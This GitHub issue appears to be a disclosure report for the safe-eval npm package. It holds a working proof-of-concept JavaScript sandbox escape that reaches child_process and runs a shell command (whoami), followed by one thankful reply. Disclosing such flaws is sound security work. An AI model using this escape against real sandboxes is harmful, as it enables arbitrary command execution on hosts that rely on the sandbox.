Skip to content
New issue

Have a question about this project? # for a free GitHub account to open an issue and contact its maintainers and the community.

#

By clicking “#”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? # to your account

Jump to bottom

Sandbox Escape #19

Open
a0xnirudh opened this issue Feb 28, 2020 · 1 comment
Open

Sandbox Escape #19

a0xnirudh opened this issue Feb 28, 2020 · 1 comment

Comments

@a0xnirudh
Copy link

The following script can lead to safe-eval sandbox escape (node v12.13.0):

const safeEval = require('safe-eval');

const theFunction = function() {
   const bad = new Error();
   bad.__proto__ = null;
   bad.stack = {
      match(outer) {
         throw outer.constructor.constructor("return process")().mainModule.require('child_process').execSync('whoami').toString();
      }
   };
   return bad;
};

const untrusted = `(${theFunction})()`;
console.log(safeEval(untrusted));

Inspired from @XmiliaH 's vm2 escape.
@a0xnirudh a0xnirudh mentioned this issue Feb 28, 2020
Open
@S4lt5
Copy link

S4lt5 commented Aug 3, 2020

@a0xnirudh Appreciate the POC. I knew you could get mainModule but did not realize the require call was so straightforward.

# for free to join this conversation on GitHub. Already have an account? # to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@S4lt5 @a0xnirudh